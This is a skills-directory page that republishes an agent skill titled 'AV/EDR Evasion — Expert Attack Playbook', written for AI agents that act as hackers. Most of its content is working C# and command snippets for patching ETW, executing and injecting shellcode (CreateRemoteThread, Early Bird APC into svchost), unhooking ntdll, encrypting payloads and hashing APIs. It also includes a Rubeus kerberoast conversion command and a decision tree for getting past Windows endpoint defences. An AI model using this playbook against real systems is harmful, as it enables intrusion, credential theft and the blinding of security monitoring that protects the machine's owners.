Agent skill

Windows Av Evasion

by yaklang in yaklang/hack-skills

AV/EDR evasion playbook for Windows. An agent skill from yaklang/hack-skills.

MITAuto-check passedSecurity

Install Windows Av Evasion

skills CLI
$ npx skills add yaklang/hack-skills --skill windows-av-evasion -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install yaklang/hack-skills windows-av-evasion --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/yaklang/hack-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/windows-av-evasion .claude/skills/windows-av-evasion && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
windows-av-evasion
GitHub stars
2.4k
Token cost
~2.9k tokens
SKILL.md length
508 words
Files
2
Skills in repo
27
Repo updated
First seen
Licence
MIT

At a glance

AV/EDR evasion playbook for Windows. An agent skill from yaklang/hack-skills.

  • Works in 10 steps: RELATED ROUTING → AMSI BYPASS OVERVIEW → ETW BYPASS → …
  • .NET assembly detection
  • SKILL.md covers 0. RELATED ROUTING, 1. AMSI BYPASS OVERVIEW, 2. ETW BYPASS and 3. .NET ASSEMBLY LOADING, plus 5 more sections
  • Calls dotnet

What it does

Windows Av Evasion is an agent skill from yaklang/hack-skills. AV/EDR evasion playbook for Windows. Use when bypassing AMSI, ETW, .NET assembly detection, shellcode execution, process injection, API hooking, and signature-based detection on Windows endpoints.

Its SKILL.md is about 2.9k tokens, which your agent loads only when the skill is triggered. The skill folder holds 1 other file (for example `AMSI_BYPASS_TECHNIQUES.md`).

It sits in Security, covering Red teaming and adversary simulation. It works with .NET and PowerShell. The repository describes itself as: Helping AI Agent become an awesome practical hacker! The licence is MIT.

When your agent uses it

  • .NET assembly detection
  • Shellcode execution
  • Process injection
  • Signature-based detection on Windows endpoints

Example prompts

  • “/windows-av-evasion”

Workflow steps

10 steps, taken from the step headings in SKILL.md.

  1. RELATED ROUTING
  2. AMSI BYPASS OVERVIEW
  3. ETW BYPASS
  4. .NET ASSEMBLY LOADING
  5. SHELLCODE EXECUTION TECHNIQUES
  6. PROCESS INJECTION TECHNIQUES
  7. UNHOOKING — BYPASS EDR API HOOKS
  8. PAYLOAD ENCRYPTION & OBFUSCATION
  9. SIGNATURE EVASION
  10. AV/EDR EVASION DECISION TREE

What it can do on your machine

Read from SKILL.md and the folder at commit 6fbf0bc. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • dotnet

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Windows Av Evasion loads about 2.9k tokens when it runs. Until then it costs about 54 tokens; SKILL.md has 508 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~54
When it runs · the whole SKILL.md, loaded when a task matches
~2.9k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from yaklang/hack-skills at commit 6fbf0bc, republished under its MIT licence (© yaklang). 508 words, ~2,861 tokens.

Download SKILL.mdSave it as .claude/skills/windows-av-evasion/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.
name
windows-av-evasion
description
AV/EDR evasion playbook for Windows. Use when bypassing AMSI, ETW, .NET assembly detection, shellcode execution, process injection, API hooking, and signature-based detection on Windows endpoints.

SKILL: AV/EDR Evasion — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert AV/EDR evasion techniques for Windows. Covers AMSI bypass, ETW bypass, .NET assembly loading, shellcode execution, process injection, unhooking, payload encryption, and signature evasion. Base models miss detection-specific bypass chains and syscall-level evasion nuances.

Before going deep, consider loading:

Advanced Reference

Also load AMSI_BYPASS_TECHNIQUES.md when you need:

  • Detailed AMSI bypass code patterns (memory patching, reflection)
  • PowerShell-specific AMSI bypasses
  • .NET AMSI bypass techniques

1. AMSI BYPASS OVERVIEW

AMSI (Antimalware Scan Interface) inspects PowerShell, .NET, VBScript, JScript, and Office macros at runtime.

Key AMSI Bypass Categories
CategoryMethodDetection RiskPersistence
Memory patchingPatch AmsiScanBuffer in amsi.dllMediumPer-process
ReflectionModify AMSI init flags via .NET reflectionMediumPer-session
String obfuscationEncode/split AMSI trigger stringsLowPer-payload
PowerShell downgradeForce PS v2 (no AMSI)LowPer-session
CLM bypassEscape Constrained Language ModeMediumPer-session
COM hijackRedirect AMSI COM serverLowPer-user
Quick AMSI Bypass (One-Liners)
powershell
# PowerShell v2 downgrade (if .NET 2.0 available — no AMSI in v2)
powershell -Version 2

# Reflection-based (set amsiInitFailed = true)
# Obfuscated to avoid static detection — see AMSI_BYPASS_TECHNIQUES.md for full patterns

2. ETW BYPASS

ETW (Event Tracing for Windows) feeds telemetry to EDR. Patching EtwEventWrite stops .NET assembly load events.

Patch EtwEventWrite
csharp
// C# — patch EtwEventWrite to return immediately
var ntdll = GetModuleHandle("ntdll.dll");
var etwAddr = GetProcAddress(ntdll, "EtwEventWrite");
// Write: ret (0xC3) to first byte
VirtualProtect(etwAddr, 1, 0x40, out uint oldProtect);
Marshal.WriteByte(etwAddr, 0xC3);
VirtualProtect(etwAddr, 1, oldProtect, out _);
PowerShell ETW Bypass
powershell
# Disable Script Block Logging (ETW provider)
[Reflection.Assembly]::LoadWithPartialName('System.Management.Automation')
# Set internal field to disable ETW tracing

3. .NET ASSEMBLY LOADING

In-Memory Assembly.Load
csharp
byte[] assemblyBytes = File.ReadAllBytes("tool.exe");
// Or download from URL, decrypt from resource
Assembly assembly = Assembly.Load(assemblyBytes);
assembly.EntryPoint.Invoke(null, new object[] { args });
Donut — Convert .NET Assembly to Shellcode
bash
# Generate shellcode from .NET EXE
donut -f tool.exe -o payload.bin -a 2 -c ToolNamespace.Program -m Main

# With parameters
donut -f Rubeus.exe -o rubeus.bin -a 2 -p "kerberoast /outfile:tgs.txt"

# Then load shellcode via any injection technique (§5)
execute-assembly (C2 Framework)
# Cobalt Strike
execute-assembly /path/to/Rubeus.exe kerberoast

# Sliver
execute-assembly /path/to/SharpHound.exe -c all

# Havoc
dotnet inline-execute /path/to/tool.exe args

4. SHELLCODE EXECUTION TECHNIQUES

VirtualAlloc + Callback (Avoids CreateThread)
csharp
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
Marshal.Copy(sc, 0, addr, sc.Length);
// Use callback API instead of CreateThread (less monitored)
EnumWindows(addr, IntPtr.Zero);

Callback APIs for shellcode execution: EnumWindows, EnumChildWindows, EnumFonts, EnumDesktops, CertEnumSystemStore, EnumDateFormats — all accept function pointers that can point to shellcode.


5. PROCESS INJECTION TECHNIQUES

TechniqueAPIs UsedDetection RiskNotes
CreateRemoteThreadOpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThreadHighClassic, heavily monitored
NtMapViewOfSectionNtCreateSection, NtMapViewOfSectionMediumShared memory, less common
Process HollowingCreateProcess (SUSPENDED), NtUnmapViewOfSection, WriteProcessMemory, ResumeThreadMediumReplace process image
Thread HijackingSuspendThread, SetThreadContext, ResumeThreadMediumModify existing thread
Early BirdCreateProcess (SUSPENDED), QueueUserAPC, ResumeThreadLow-MediumAPC before main thread
Phantom DLL HollowingMap DLL section, overwrite with shellcodeLowUses legitimate DLL mapping
Module StompingLoadLibrary, overwrite .text sectionLowBacked by legitimate DLL
Transacted HollowingNtCreateTransaction, NtCreateSectionLowNo suspicious allocations
Show full SKILL.md (167 more words)Show less
CreateRemoteThread (Basic Pattern)
csharp
IntPtr hProcess = OpenProcess(0x001F0FFF, false, targetPid);
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
WriteProcessMemory(hProcess, addr, sc, (uint)sc.Length, out _);
CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
Early Bird APC Injection
csharp
// Create suspended process
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", ..., CREATE_SUSPENDED, ..., ref si, ref pi);

// Allocate and write shellcode
IntPtr addr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
WriteProcessMemory(pi.hProcess, addr, sc, (uint)sc.Length, out _);

// Queue APC to main thread (runs before main entry point)
QueueUserAPC(addr, pi.hThread, IntPtr.Zero);
ResumeThread(pi.hThread);

6. UNHOOKING — BYPASS EDR API HOOKS

Direct Syscalls (SysWhispers / HellsGate)

EDR hooks ntdll.dll functions. Direct syscalls bypass hooks by invoking the kernel directly.

Normal: User code → ntdll.dll (HOOKED) → kernel
Direct: User code → syscall instruction → kernel (bypasses hook)
ToolMethodNotes
SysWhispers2/3Compile-time syscall stubsStatic syscall numbers
HellsGateRuntime syscall number resolutionDynamic, harder to detect
HalosGateResolve from neighboring unhooked syscallsHandles partial hooks
TartarusGateExtended HalosGateMore robust resolution
Fresh ntdll Copy
csharp
// Read clean ntdll.dll from disk
byte[] cleanNtdll = File.ReadAllBytes(@"C:\Windows\System32\ntdll.dll");
// Or from KnownDlls: \KnownDlls\ntdll.dll
// Or from suspended process (create sacrificial process, read its ntdll)

// Overwrite hooked .text section with clean copy
// → All EDR hooks in ntdll are removed
Indirect Syscalls
// Instead of: syscall (in your code — suspicious)
// Do: jump to syscall instruction inside ntdll.dll (legitimate location)
// The ret address on stack points to ntdll.dll, not your code

7. PAYLOAD ENCRYPTION & OBFUSCATION

Encryption Methods
csharp
// AES encryption (preferred)
using Aes aes = Aes.Create();
aes.Key = key; aes.IV = iv;
byte[] encrypted = aes.CreateEncryptor().TransformFinalBlock(shellcode, 0, shellcode.Length);

// XOR (simple, fast)
for (int i = 0; i < shellcode.Length; i++)
    shellcode[i] ^= key[i % key.Length];

// RC4 (stream cipher, simple implementation)
Sleep Obfuscation

Encrypt shellcode in memory during sleep to avoid memory scanners.

TechniqueMethod
EkkoROP chain → encrypt heap/stack during sleep
FoliageAPC-based sleep with memory encryption
DeathSleepThread de-registration during sleep
Staged Loading
Stage 1: Small, encrypted loader (evades static analysis)
Stage 2: Download actual payload at runtime (encrypted)
Stage 3: Decrypt in memory → execute

8. SIGNATURE EVASION

String Encryption
csharp
// Avoid plaintext API names, URLs, tool names
// Use encrypted strings, decrypt at runtime
string decrypted = Decrypt(encryptedApiName);
IntPtr funcPtr = GetProcAddress(GetModuleHandle("kernel32.dll"), decrypted);
API Hashing
csharp
// Resolve API by hash instead of name (avoids string detection)
// Hash "VirtualAlloc" → 0x91AFCA54
IntPtr func = GetProcAddressByHash(module, 0x91AFCA54);
Metadata Removal
bash
# Strip .NET metadata
ConfuserEx / .NET Reactor / Obfuscar

# Remove PE metadata (timestamps, rich header, debug info)
# Modify compilation timestamps
# Strip PDB paths
C2 Framework Evasion
FrameworkKey Evasion Features
Cobalt StrikeMalleable C2 profiles, HTTP/S traffic shaping, sleep jitter, PE evasion
SliverMultiple protocols (mTLS, WireGuard, DNS), stager-less, built-in obfuscation
HavocIndirect syscalls, sleep obfuscation, module stomping
Brute RatelBadger agent, syscall evasion, ETW/AMSI bypass built-in

9. AV/EDR EVASION DECISION TREE

Need to execute tool/payload on protected host
│
├── PowerShell-based payload?
│   ├── AMSI blocking? → AMSI bypass first (§1)
│   │   ├── .NET 2.0 available? → PS v2 downgrade (no AMSI)
│   │   ├── Memory patch AmsiScanBuffer
│   │   └── Reflection-based bypass
│   ├── Script Block Logging? → ETW bypass (§2)
│   └── Constrained Language Mode? → CLM bypass or switch to C#
│
├── .NET assembly (Rubeus, SharpHound, etc.)?
│   ├── Direct execution blocked?
│   │   ├── In-memory Assembly.Load (§3)
│   │   ├── Convert to shellcode with Donut (§3)
│   │   └── Use C2 execute-assembly (§3)
│   └── Still detected?
│       ├── Obfuscate assembly (ConfuserEx)
│       ├── Modify source + recompile
│       └── Use BOFs (Beacon Object Files) if CS
│
├── Shellcode execution needed?
│   ├── Basic → VirtualAlloc + callback (§4)
│   ├── Need injection → choose technique by OPSEC (§5)
│   │   ├── Low detection needed → module stomping or phantom DLL
│   │   ├── Medium → early bird APC or NtMapViewOfSection
│   │   └── Quick and dirty → CreateRemoteThread
│   └── Memory scanners detect payload?
│       ├── Encrypt payload → decrypt only at execution (§7)
│       └── Sleep obfuscation (Ekko/Foliage) (§7)
│
├── EDR hooking ntdll.dll?
│   ├── Direct syscalls (SysWhispers3/HellsGate) (§6)
│   ├── Fresh ntdll copy from disk/KnownDlls (§6)
│   └── Indirect syscalls (return to ntdll instruction) (§6)
│
├── Signature detection?
│   ├── Known tool signature → modify + recompile
│   ├── String-based → string encryption / API hashing (§8)
│   ├── PE metadata → strip/modify (§8)
│   └── Behavioral → change execution flow, add junk code
│
└── All local evasion fails?
    ├── Use Living-off-the-Land (LOLBins): certutil, mshta, regsvr32
    ├── Use legitimate admin tools (PsExec, WMI, WinRM)
    └── Switch to fileless / memory-only techniques

© yaklang, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 1 other file in skills/windows-av-evasion of yaklang/hack-skills.

  • SKILL.md
  • AMSI_BYPASS_TECHNIQUES.md

Open the folder on GitHubat commit 6fbf0bc

Compare with similar skills

Windows Av Evasion next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Windows Av Evasion compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Windows Av Evasion this skillyaklang/hack-skills2.4k—~2.9kAutomated safety check: PassMIT
Ctf Malwareljagiello/ctf-skills3.4k—~2.1kAutomated safety check: NotesMIT
Windows Serversickn33/agentic-awesome-skills47k2 repos~2.9kAutomated safety check: PassMIT
Detecting Fileless Malware Techniquesmukul975/Anthropic-Cybersecurity-Skills34k—~4.2kAutomated safety check: PassApache-2.0
Performing Purple Team Atomic Testingmukul975/Anthropic-Cybersecurity-Skills34k—~9.8kAutomated safety check: PassApache-2.0
Analyzing Powershell Empire Artifactsmukul975/Anthropic-Cybersecurity-Skills34k—~719Automated safety check: PassApache-2.0

Similar skills

  • Ctf Malware

    ljagiello/ctf-skills

    Provides malware analysis and network traffic techniques for CTF challenges.

    3.4k GitHub stars~2.1k tokensUpdated 27 days ago
    SecurityAuto-check: notes
  • Windows Server

    sickn33/agentic-awesome-skills

    Administer Windows Server systems. An agent skill from sickn33/agentic-awesome-skills.

    47k GitHub starsUsed in 2 repos~2.9k tokens
    SecurityAuto-check passed
  • Detecting Fileless Malware Techniques

    mukul975/Anthropic-Cybersecurity-Skills

    Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing…

    34k GitHub stars~4.2k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Performing Purple Team Atomic Testing

    mukul975/Anthropic-Cybersecurity-Skills

    Executes Atomic Red Team tests mapped to MITRE ATT&CK via Invoke-AtomicRedTeam PowerShell, generates ATT&CK Navigator coverage heatmaps, correlates results against Sigma rules, and runs detection…

    34k GitHub stars~9.8k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Analyzing Powershell Empire Artifacts

    mukul975/Anthropic-Cybersecurity-Skills

    Detect PowerShell Empire post-exploitation framework artifacts in Windows Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103), including the default launcher string…

    34k GitHub stars~719 tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Hunting For Lateral Movement Via Wmi

    mukul975/Anthropic-Cybersecurity-Skills

    Detects WMI-based lateral movement (e.g. An agent skill from mukul975/Anthropic-Cybersecurity-Skills.

    34k GitHub stars~659 tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from yaklang/hack-skills

All 27 skills in this repo
  • Anti Debugging Techniques

    yaklang/hack-skills

    Anti-debugging detection and bypass playbook. An agent skill from yaklang/hack-skills.

    2.4k GitHub stars~3.4k tokensUpdated 27 days ago
    Auto-check passed
  • API Auth And JWT Abuse

    yaklang/hack-skills

    API authentication and JWT abuse playbook. An agent skill from yaklang/hack-skills.

    2.4k GitHub stars~567 tokensUpdated 27 days ago
    Auto-check passed
  • API Authorization And Bola

    yaklang/hack-skills

    API authorization and BOLA testing playbook. An agent skill from yaklang/hack-skills.

    2.4k GitHub stars~449 tokensUpdated 27 days ago
    Auto-check passed
  • API Recon And Docs

    yaklang/hack-skills

    API reconnaissance and documentation review playbook. An agent skill from yaklang/hack-skills.

    2.4k GitHub stars~456 tokensUpdated 27 days ago
    Auto-check passed
  • Attack Surface Mapping

    yaklang/hack-skills

    Draw a testable attack surface from one authorized target URL or one application.

    2.4k GitHub stars~2.6k tokensUpdated 27 days ago
    Auto-check passed
  • Classical Cipher Analysis

    yaklang/hack-skills

    Classical cipher analysis playbook. An agent skill from yaklang/hack-skills.

    2.4k GitHub stars~4.8k tokensUpdated 27 days ago
    Auto-check passed

Works with

Categories

Questions about Windows Av Evasion

What does Windows Av Evasion do?

AV/EDR evasion playbook for Windows. An agent skill from yaklang/hack-skills. Windows Av Evasion is an agent skill from yaklang/hack-skills. AV/EDR evasion playbook for Windows.

When should I use Windows Av Evasion?

Windows Av Evasion fits situations like: .NET assembly detection; shellcode execution; process injection; signature-based detection on Windows endpoints.

How do I install Windows Av Evasion in Claude Code?

Run `npx skills add yaklang/hack-skills --skill windows-av-evasion -a claude-code`. Or copy the skill folder (skills/windows-av-evasion in yaklang/hack-skills) into .claude/skills/windows-av-evasion in your project. Claude Code loads it when a task matches its description.

How do I install Windows Av Evasion in Codex?

Run `npx skills add yaklang/hack-skills --skill windows-av-evasion -a codex`. Or copy the skill folder (skills/windows-av-evasion in yaklang/hack-skills) into .agents/skills/windows-av-evasion in your project. Codex loads it when a task matches its description.

Can I use Windows Av Evasion in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add yaklang/hack-skills --skill windows-av-evasion -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/windows-av-evasion, .gemini/skills/windows-av-evasion, .github/skills/windows-av-evasion and .opencode/skills/windows-av-evasion in your project.

What does Windows Av Evasion need to run?

Going by SKILL.md and its folder, Windows Av Evasion needs the command-line tools its instructions call (dotnet).

Does Windows Av Evasion access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Windows Av Evasion safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Windows Av Evasion use?

Windows Av Evasion is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Windows Av Evasion use?

About 2.9k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Windows Av Evasion?

Skills that share tags, products or a category with Windows Av Evasion: Ctf Malware (ljagiello/ctf-skills, 3.4k stars), Windows Server (sickn33/agentic-awesome-skills, 47k stars), Detecting Fileless Malware Techniques (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Performing Purple Team Atomic Testing (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Windows Av Evasion?

yaklang (a GitHub organization) maintains it in yaklang/hack-skills, which has 2,418 GitHub stars. The repository holds 27 skills in this directory. The repository was last updated on September 13, 2026.

Source: yaklang/hack-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.